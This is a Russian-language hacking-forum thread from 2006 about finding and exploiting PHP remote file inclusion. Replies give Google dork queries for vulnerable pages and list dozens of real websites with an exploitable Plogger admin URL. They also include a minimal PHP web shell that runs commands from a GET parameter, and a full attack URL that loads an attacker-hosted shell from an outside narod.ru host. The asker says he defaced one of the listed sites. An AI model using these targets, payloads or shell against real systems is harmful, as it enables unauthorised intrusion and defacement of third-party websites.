ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Php инклудинг
  #1  
Старый 11.01.2006, 22:02
Аватар для fram
fram
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280

Репутация: -3
По умолчанию Php инклудинг

Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!
 
Ответить с цитированием

Есть такое понятие поисковик! =)
  #2  
Старый 11.01.2006, 22:06
Аватар для Utochka
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию Есть такое понятие поисковик! =)

Есть такое понятие поисковик! =)

Юзай www.Google.ru

Можно искать запросами:
inurl:"page.php?page=" filetypehp
inurl:"index.php?page=" filetypehp
inurl:"page.php?page=" site:.ru
inurl:"page.php?p=" site:.ru
inurl:"index.php?page=" site:.com

Ну там много разных вариаций.
 
Ответить с цитированием

  #3  
Старый 11.01.2006, 22:18
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

половина из них сдохла, но может найдешь действующие

на удаленом хосте должен быть файл plog-functions.php

Код HTML:
http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.mindcyber.com/wallpaper/admin/plog-admin-functions.php?config[basedir]=
http://www.kasnews.de/kunst/admin/plog-admin-functions.php?config[basedir]=
http://www.distortion2static.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ncfiremuseum.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://kelly.greneaux.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://216.22.25.215/~neeners/classic/gallery/admin/plog-admin-functions.php?config[basedir]=
http://musicbc.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.samson-mfg.com/gallery2/admin/plog-admin-functions.php?config[basedir]=
http://www.z90.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.dogtopia.biz/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.wilcofoppen.com/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aabany.org/blog/galeria/admin/plog-admin-functions.php?config[basedir]=
http://www.newdesire.org/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.boricuapower.net/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aurorapemper.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://91x.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.helpanimalsinc.org/pictures/admin/plog-admin-functions.php?config[basedir]=
http://www.trieste.si/miramare/plogger/admin/plog-admin-functions.php?config[basedir]=
http://dougal.gunters.org/test/plog/admin/plog-admin-functions.php?config[basedir]=
http://photos.pivwan.net/admin/plog-admin-functions.php?config[basedir]=
http://letatou.info/galerie/admin/plog-admin-functions.php?config[basedir]=
http://theg3nius.com/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.diazvillanueva.com/fotografia/admin/plog-admin-functions.php?config[basedir]=
http://www.hunder.ca/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.coyforce.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ourense.com/galerias/admin/plog-admin-functions.php?config[basedir]=
http://www.fjellbruk.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.karlshusgarasjene.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.uitvaartbeurs.info/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://caraga.dost.gov.ph/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.rudylacy.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.thefinalfantasy.com/picturepost/admin/plog-admin-functions.php?config[basedir]=
http://www.azadadventures.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://galleria.aainaa.com/admin/plog-admin-functions.php?config[basedir]=
 
Ответить с цитированием

  #4  
Старый 11.01.2006, 23:00
Аватар для fram
fram
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280

Репутация: -3
По умолчанию

Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377
 
Ответить с цитированием

  #5  
Старый 11.01.2006, 23:09
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

 
Ответить с цитированием

  #6  
Старый 11.01.2006, 23:20
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

plog-functions.php должен быть шелл, либо от rst либо самописный, типа

PHP код:
<?

if (!empty($_GET['cmd'])) {
echo 
'<pre>';
system($_GET['cmd']);
echo 
'</pre>';
exit;
}

?>
Плагиат Ж)

Вот пример конечной ссылки:
admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la

причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код

Последний раз редактировалось max_pain89; 11.01.2006 в 23:25..
 
Ответить с цитированием

  #7  
Старый 12.01.2006, 12:20
Аватар для fram
fram
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280

Репутация: -3
По умолчанию

max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать
 
Ответить с цитированием

  #8  
Старый 12.01.2006, 12:23
Аватар для fram
fram
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280

Репутация: -3
По умолчанию

Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787
что это и как можно исправить
 
Ответить с цитированием

  #9  
Старый 12.01.2006, 12:23
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

анти4ат против дефэйсов
 
Ответить с цитированием

  #10  
Старый 12.01.2006, 12:47
Аватар для fram
fram
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280

Репутация: -3
По умолчанию

ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Пишем Php код, устойчивый к ошибкам k00p3r Чужие Статьи 0 10.07.2005 22:34
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ